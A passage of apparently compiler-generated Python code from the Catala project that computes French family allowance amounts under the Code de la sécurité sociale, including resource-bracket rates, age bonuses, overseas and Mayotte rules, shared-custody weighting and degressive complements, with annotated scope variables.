if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=229, start_column=5,
end_line=230, end_column=46,
law_headings=["Article D521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_d521_3_252) and (ressources_menage_103 <=
plafond__i_i_d521_3_238))):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.1117"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
# Branch: resources above plafond II -> 5.59%.
def local_var_392(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=243, start_column=5,
end_line=243, end_column=43,
law_headings=["Article D521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (ressources_menage_103 >
plafond__i_i_d521_3_238)):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0559"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_391 = handle_default([local_var_392, local_var_394,
local_var_396], local_var_398,
local_var_400)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=128, start_column=11,
end_line=128, end_column=47,
law_headings=["Prologue"]))
montant_verse_forfaitaire_par_enfant_390 = log_variable_definition(["AllocationsFamiliales",
"montant_versé_forfaitaire_par_enfant"], local_var_391)
# Scope variable "montant_initial_base_troisième_enfant_et_plus"
# (Art. D521-1): base amount for the third child onward — a per-extra-child
# BMAF fraction (41% / 20.5% / 10.25% depending on the resource bracket)
# times the number of eligible children beyond two; 0 when there are at
# most two eligible children.
try:
def local_var_412(_: Any):
raise EmptyError
def local_var_410(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=112, start_column=11, end_line=112, end_column=56,
law_headings=["Prologue"]), True)
# Branch: resources at or below plafond I -> 41% per child beyond two.
def local_var_408(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=35, start_column=3,
end_line=35, end_column=41,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (ressources_menage_103 <=
plafond__i_d521_3_252)):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return ((prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.41")) *
decimal_of_integer((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) -
integer_of_string("2"))))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
# Branch: resources between the two ceilings -> 20.5% per child beyond two.
def local_var_406(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=74, start_column=3,
end_line=75, end_column=44,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_d521_3_252) and (ressources_menage_103 <=
plafond__i_i_d521_3_238))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return ((prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.205")) *
decimal_of_integer((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) -
integer_of_string("2"))))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
# Branch: resources above plafond II -> 10.25% per child beyond two.
def local_var_404(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=113, start_column=3,
end_line=113, end_column=41,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (ressources_menage_103 >
plafond__i_i_d521_3_238)):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return ((prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.1025")) *
decimal_of_integer((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) -
integer_of_string("2"))))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_403 = handle_default([local_var_404, local_var_406,
local_var_408], local_var_410,
local_var_412)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=112, start_column=11,
end_line=112, end_column=56,
law_headings=["Prologue"]))
montant_initial_base_troisieme_enfant_et_plus_402 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_base_troisième_enfant_et_plus"], local_var_403)
# Scope variable "montant_initial_base_deuxième_enfant" (Art. D521-1):
# base amount for the second child — a single BMAF fraction (32% / 16% /
# 8% by resource bracket) when there is more than one eligible child,
# 0 otherwise.  Same bracket structure as the third-child-and-up variable.
try:
def local_var_424(_: Any):
raise EmptyError
def local_var_422(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=111, start_column=11, end_line=111, end_column=47,
law_headings=["Prologue"]), True)
# Branch: resources at or below plafond I -> 32% of the base.
def local_var_420(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=35, start_column=3,
end_line=35, end_column=41,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (ressources_menage_103 <=
plafond__i_d521_3_252)):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.32"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
# Branch: resources between the two ceilings -> 16%.
def local_var_418(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=74, start_column=3,
end_line=75, end_column=44,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_d521_3_252) and (ressources_menage_103 <=
plafond__i_i_d521_3_238))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.16"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
# Branch: resources above plafond II -> 8%.
def local_var_416(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=113, start_column=3,
end_line=113, end_column=41,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (ressources_menage_103 >
plafond__i_i_d521_3_238)):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.08"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_415 = handle_default([local_var_416, local_var_418,
local_var_420], local_var_422,
local_var_424)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=111, start_column=11,
end_line=111, end_column=47,
law_headings=["Prologue"]))
montant_initial_base_deuxieme_enfant_414 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_base_deuxième_enfant"], local_var_415)
# Scope variable "rapport_enfants_total_moyen": ratio of the mean child
# count to the total child count, guarded against division by zero
# (0 when the total is 0).  nombre_total_enfants_353 and
# nombre_moyen_enfants_355 are defined before this chunk.
try:
try:
try:
if (nombre_total_enfants_353 ==
decimal_of_string("0.")):
local_var_427 = decimal_of_string("0.")
else:
local_var_427 = (nombre_moyen_enfants_355 /
nombre_total_enfants_353)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=113, start_column=11,
end_line=113, end_column=38,
law_headings=["Prologue"]))
rapport_enfants_total_moyen_426 = log_variable_definition(["AllocationsFamiliales",
"rapport_enfants_total_moyen"], local_var_427)
# Scope variable "montant_initial_métropole_majoration" (Art. D521-1 and
# the épilogue decree): per-child age bonus in metropolitan France.
# For a child entitled to the bonus (droit_ouvert_majoration), the bonus
# is 16% / 8% / 4% of the BMAF depending on the resource bracket; a child
# not entitled gets 0.  Each branch re-invokes droit_ouvert_majoration_376
# through the logging wrappers, so log ordering is part of the observable
# behavior.
try:
def local_var_429(param_430: Enfant):
try:
def local_var_441(_: Any):
raise EmptyError
def local_var_439(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=133, start_column=11,
end_line=133, end_column=47,
law_headings=["Prologue"]), True)
# Branch: resources <= plafond I and child entitled -> 16%.
def local_var_437(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=55, start_column=3,
end_line=55, end_column=41,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 <=
plafond__i_d521_3_252) and
log_end_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
droit_ouvert_majoration_376,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "input"],
param_430)))))):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.16"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
# Branch: resources between the ceilings and child entitled -> 8%.
def local_var_435(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=95, start_column=3,
end_line=96, end_column=44,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (((ressources_menage_103 >
plafond__i_d521_3_252) and
(ressources_menage_103 <=
plafond__i_i_d521_3_238)) and
log_end_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
droit_ouvert_majoration_376,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "input"],
param_430)))))):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.08"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
# Branch: resources above plafond II and child entitled -> 4%.
def local_var_433(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=132, start_column=3,
end_line=132, end_column=41,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_i_d521_3_238) and
log_end_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
droit_ouvert_majoration_376,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "input"],
param_430)))))):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.04"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
# Branch (épilogue decree): child not entitled to the bonus -> 0.
def local_var_431(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./epilogue.catala_fr",
start_line=27, start_column=5,
end_line=27, end_column=44,
law_headings=["Règles diverses", "Épilogue",
"Décrets divers"]), not log_end_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
droit_ouvert_majoration_376,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "input"],
param_430))))):
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
return handle_default([local_var_431, local_var_433,
local_var_435, local_var_437],
local_var_439, local_var_441)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=133,
start_column=11,
end_line=133,
end_column=47,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=133, start_column=11,
end_line=133, end_column=47,
law_headings=["Prologue"]))
montant_initial_metropole_majoration_428 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_métropole_majoration"], local_var_429)
# Scope variable "montant_versé_forfaitaire": per-child lump-sum amount
# times the number of dependent children entitled to the lump sum.
# local_var_445 is the fold step: it counts children for which
# droit_ouvert_forfaitaire_268 (defined before this chunk) holds, with
# the call routed through the logging wrappers.
try:
try:
try:
def local_var_445(acc_446: Integer, enfant_447: Any):
if log_end_call(["AllocationsFamiliales",
"droit_ouvert_forfaitaire"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_forfaitaire", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_forfaitaire"],
droit_ouvert_forfaitaire_268,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_forfaitaire", "input"],
enfant_447)))):
return (acc_446 + integer_of_string("1"))
else:
return acc_446
local_var_444 = (montant_verse_forfaitaire_par_enfant_390 *
decimal_of_integer(list_fold_left(local_var_445,
integer_of_string(
"0"),
enfants_a_charge_106)))
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=129, start_column=11,
end_line=129, end_column=36,
law_headings=["Prologue"]))
montant_verse_forfaitaire_443 = log_variable_definition(["AllocationsFamiliales",
"montant_versé_forfaitaire"], local_var_444)
# Scope variable "montant_initial_base": the initial base amount of the
# family allowance.  Default branches: Mayotte residence sums the four
# per-rank Mayotte amounts; the overseas (DOM, Art. D755-5) single-child
# regime uses the first-child amount; otherwise (base case) the sum of
# the second-child and third-child-and-up amounts computed above.
try:
try:
# Base case: metropolitan rule, 2nd child + 3rd-and-up amounts.
def local_var_456(_: Any):
try:
return (montant_initial_base_deuxieme_enfant_414 +
montant_initial_base_troisieme_enfant_et_plus_402)
except EmptyError:
raise EmptyError
def local_var_454(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=109, start_column=11,
end_line=109, end_column=31,
law_headings=["Prologue"]), True)
# Branch (Art. D755-5): overseas regime with exactly one eligible child.
def local_var_452(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=350, start_column=5,
end_line=351, end_column=69,
law_headings=["Article D755-5",
"Chapitre 5 : Prestations familiales et prestations assimilées",
"Titre 5 : Départements d'outre-mer",
"Livre 7 : Régimes divers - Dispositions diverses",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (prestations_familiales_dot_regime_outre_mer_l751_1_221 and
(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) ==
integer_of_string("1")))):
return montant_initial_base_premier_enfant_364
else:
raise EmptyError
except EmptyError:
raise EmptyError
# Branch (decree 2002-423, Art. 7): Mayotte residence.
def local_var_450(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=335, start_column=5,
end_line=335, end_column=24,
law_headings=["Article 7",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), (residence_104 ==
Collectivite(Collectivite_Code.Mayotte,
Unit()))):
return (montant_initial_base_premier_enfant_mayotte_325 +
(montant_initial_base_deuxieme_enfant_mayotte_299 +
(montant_initial_base_troisieme_enfant_mayotte_273 +
montant_initial_base_quatrieme_enfant_et_plus_mayotte_271)))
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_449 = handle_default([local_var_450, local_var_452],
local_var_454, local_var_456)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=109, start_column=11,
end_line=109, end_column=31,
law_headings=["Prologue"]))
montant_initial_base_448 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_base"], local_var_449)
# Scope variable "montant_initial_majoration": per-child age bonus.
# Default branches (Art. D755-5) give overseas single-child households
# 3.69% of the BMAF for ages 11-15 and 5.67% from age 16; the base case
# delegates to the metropolitan bonus computed above.  All calls go
# through the logging wrappers.
try:
def local_var_459(param_460: Enfant):
try:
try:
# Base case: delegate to the metropolitan per-child bonus.
def local_var_467(_: Any):
try:
return log_end_call(["AllocationsFamiliales",
"montant_initial_métropole_majoration"],
log_variable_definition(["AllocationsFamiliales",
"montant_initial_métropole_majoration",
"output"],
log_begin_call(["AllocationsFamiliales",
"montant_initial_métropole_majoration"],
montant_initial_metropole_majoration_428,
log_variable_definition(["AllocationsFamiliales",
"montant_initial_métropole_majoration",
"input"], param_460))))
except EmptyError:
raise EmptyError
def local_var_465(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=134, start_column=11,
end_line=134, end_column=37,
law_headings=["Prologue"]), True)
# Branch: overseas regime, one eligible child, age in [11, 16) -> 3.69%.
def local_var_463(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=373, start_column=5,
end_line=376, end_column=42,
law_headings=["Article D755-5",
"Chapitre 5 : Prestations familiales et prestations assimilées",
"Titre 5 : Départements d'outre-mer",
"Livre 7 : Régimes divers - Dispositions diverses",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (log_end_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
droit_ouvert_majoration_376,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "input"],
param_460)))) and
(prestations_familiales_dot_regime_outre_mer_l751_1_221 and
((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) ==
integer_of_string("1")) and
((param_460.age >=
integer_of_string("11")) and (param_460.age <
integer_of_string("16"))))))):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0369"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
# Branch: overseas regime, one eligible child, age >= 16 -> 5.67%.
def local_var_461(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=382, start_column=5,
end_line=385, end_column=23,
law_headings=["Article D755-5",
"Chapitre 5 : Prestations familiales et prestations assimilées",
"Titre 5 : Départements d'outre-mer",
"Livre 7 : Régimes divers - Dispositions diverses",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (log_end_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
droit_ouvert_majoration_376,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "input"],
param_460)))) and
(prestations_familiales_dot_regime_outre_mer_l751_1_221 and
((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) ==
integer_of_string("1")) and (param_460.age >=
integer_of_string("16")))))):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0567"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
return handle_default([local_var_461, local_var_463],
local_var_465, local_var_467)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=134,
start_column=11,
end_line=134,
end_column=37,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=134, start_column=11,
end_line=134, end_column=37,
law_headings=["Prologue"]))
montant_initial_majoration_458 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_majoration"], local_var_459)
# Scope variable "montant_versé_complément_pour_forfaitaire"
# (Art. D521-2): degressive complement applied to the lump-sum amount —
# same linear taper formula as complément_dégressif, but instantiated
# with montant_verse_forfaitaire_443 against each resource ceiling;
# 0 when no taper applies.
try:
try:
def local_var_477(_: Any):
return money_of_cents_string("0")
def local_var_475(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=143, start_column=11,
end_line=143, end_column=52,
law_headings=["Prologue"]), True)
# Branch: taper against plafond I.
def local_var_473(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=262, start_column=5,
end_line=264, end_column=42,
law_headings=["Article D521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_d521_3_252) and (ressources_menage_103 <=
(plafond__i_d521_3_252 +
(montant_verse_forfaitaire_443 *
decimal_of_string("12.")))))):
return ((plafond__i_d521_3_252 +
((montant_verse_forfaitaire_443 *
decimal_of_string("12.")) -
ressources_menage_103)) *
(decimal_of_string("1.") /
decimal_of_string("12.")))
else:
raise EmptyError
except EmptyError:
raise EmptyError
# Branch: taper against plafond II.
def local_var_471(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=272, start_column=5,
end_line=274, end_column=41,
law_headings=["Article D521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_i_d521_3_238) and
(ressources_menage_103 <= (plafond__i_i_d521_3_238 +
(montant_verse_forfaitaire_443 *
decimal_of_string("12.")))))):
return ((plafond__i_i_d521_3_238 +
((montant_verse_forfaitaire_443 *
decimal_of_string("12.")) -
ressources_menage_103)) *
(decimal_of_string("1.") /
decimal_of_string("12.")))
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_470 = handle_default([local_var_471, local_var_473],
local_var_475, local_var_477)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=143, start_column=11,
end_line=143, end_column=52,
law_headings=["Prologue"]))
montant_verse_complement_pour_forfaitaire_469 = log_variable_definition(["AllocationsFamiliales",
"montant_versé_complément_pour_forfaitaire"], local_var_470)
# Scope variable "montant_avec_garde_alternée_base": base amount scaled
# by the shared-custody ratio (mean/total eligible children).
try:
try:
try:
local_var_480 = (montant_initial_base_448 *
rapport_enfants_total_moyen_426)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=116, start_column=11,
end_line=116, end_column=43,
law_headings=["Prologue"]))
montant_avec_garde_alternee_base_479 = log_variable_definition(["AllocationsFamiliales",
"montant_avec_garde_alternée_base"], local_var_480)
# Scope variable "montant_avec_garde_alternée_majoration": per-child age
# bonus weighted by how the child is counted for shared custody —
# full (1.), shared (0.5) or not counted (0.), as returned by the
# prise_en_compte scope variable (defined before this chunk).
try:
def local_var_482(param_483: Enfant):
try:
try:
try:
match_arg_557 = log_end_call(["AllocationsFamiliales",
"prise_en_compte"],
log_variable_definition(["AllocationsFamiliales",
"prise_en_compte", "output"],
log_begin_call(["AllocationsFamiliales",
"prise_en_compte"], prise_en_compte_108,
log_variable_definition(["AllocationsFamiliales",
"prise_en_compte", "input"],
param_483))))
# Compiled pattern-match on the PriseEnCompte variant; the three
# cases are exhaustive for this enum, so local_var_484 is always set.
if match_arg_557.code == PriseEnCompte_Code.Complete:
_ = match_arg_557.value
local_var_484 = decimal_of_string("1.")
elif match_arg_557.code == PriseEnCompte_Code.Partagee:
_ = match_arg_557.value
local_var_484 = decimal_of_string("0.5")
elif match_arg_557.code == PriseEnCompte_Code.Zero:
_ = match_arg_557.value
local_var_484 = decimal_of_string("0.")
return (log_end_call(["AllocationsFamiliales",
"montant_initial_majoration"],
log_variable_definition(["AllocationsFamiliales",
"montant_initial_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"montant_initial_majoration"],
montant_initial_majoration_458,
log_variable_definition(["AllocationsFamiliales",
"montant_initial_majoration", "input"],
param_483)))) * local_var_484)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=135,
start_column=11,
end_line=135,
end_column=49,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=135, start_column=11,
end_line=135, end_column=49,
law_headings=["Prologue"]))
montant_avec_garde_alternee_majoration_481 = log_variable_definition(["AllocationsFamiliales",
"montant_avec_garde_alternée_majoration"], local_var_482)
# Scope variable "montant_versé_base": the shared-custody-adjusted base
# amount when the household's base entitlement is open, else 0.
try:
try:
try:
if droit_ouvert_base_366:
local_var_489 = montant_avec_garde_alternee_base_479
else:
local_var_489 = money_of_cents_string("0")
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=117, start_column=11,
end_line=117, end_column=29,
law_headings=["Prologue"]))
montant_verse_base_488 = log_variable_definition(["AllocationsFamiliales",
"montant_versé_base"], local_var_489)
# Scope variable "montant_versé_majoration": sum over all dependent
# children of the shared-custody-adjusted age bonus, when the base
# entitlement is open; 0 otherwise.
try:
try:
try:
if droit_ouvert_base_366:
# Fold step: accumulate the per-child bonus via the logged call.
def local_var_492(acc_493: Money, enfant_494: Any):
return (acc_493 +
log_end_call(["AllocationsFamiliales",
"montant_avec_garde_alternée_majoration"],
log_variable_definition(["AllocationsFamiliales",
"montant_avec_garde_alternée_majoration",
"output"],
log_begin_call(["AllocationsFamiliales",
"montant_avec_garde_alternée_majoration"],
montant_avec_garde_alternee_majoration_481,
log_variable_definition(["AllocationsFamiliales",
"montant_avec_garde_alternée_majoration",
"input"], enfant_494)))))
local_var_491 = list_fold_left(local_var_492,
money_of_cents_string("0"),
enfants_a_charge_106)
else:
local_var_491 = money_of_cents_string("0")
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=136, start_column=11,
end_line=136, end_column=35,
law_headings=["Prologue"]))
montant_verse_majoration_490 = log_variable_definition(["AllocationsFamiliales",
"montant_versé_majoration"], local_var_491)
# Scope variable "montant_base_complément_pour_base_et_majoration":
# base + bonus total, used as the input of the degressive complement.
try:
try:
try:
local_var_496 = (montant_verse_base_488 +
montant_verse_majoration_490)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=140, start_column=11,
end_line=140, end_column=58,
law_headings=["Prologue"]))
montant_base_complement_pour_base_et_majoration_495 = log_variable_definition(["AllocationsFamiliales",
"montant_base_complément_pour_base_et_majoration"], local_var_496)
# Scope variable "montant_versé_complément_pour_base_et_majoration":
# applies the degressive complement to the base+bonus total when the
# complement entitlement is open (droit_ouvert_complement_266, defined
# before this chunk); 0 otherwise.
try:
try:
try:
if droit_ouvert_complement_266:
local_var_498 = log_end_call(["AllocationsFamiliales",
"complément_dégressif"],
log_variable_definition(["AllocationsFamiliales",
"complément_dégressif", "output"],
log_begin_call(["AllocationsFamiliales",
"complément_dégressif"], complement_degressif_379,
log_variable_definition(["AllocationsFamiliales",
"complément_dégressif", "input"],
montant_base_complement_pour_base_et_majoration_495))))
else:
local_var_498 = money_of_cents_string("0")
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=142, start_column=11,
end_line=142, end_column=59,
law_headings=["Prologue"]))
montant_verse_complement_pour_base_et_majoration_497 = log_variable_definition(["AllocationsFamiliales",
"montant_versé_complément_pour_base_et_majoration"], local_var_498)
# Scope output "montant_versé": grand total actually paid — base + bonus
# + lump sum + both degressive complements — when the base entitlement
# is open, else 0.
try:
try:
try:
if droit_ouvert_base_366:
local_var_500 = (montant_verse_base_488 +
(montant_verse_majoration_490 +
(montant_verse_forfaitaire_443 +
(montant_verse_complement_pour_base_et_majoration_497 +
montant_verse_complement_pour_forfaitaire_469))))
else:
local_var_500 = money_of_cents_string("0")
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=105, start_column=10,
end_line=105, end_column=23,
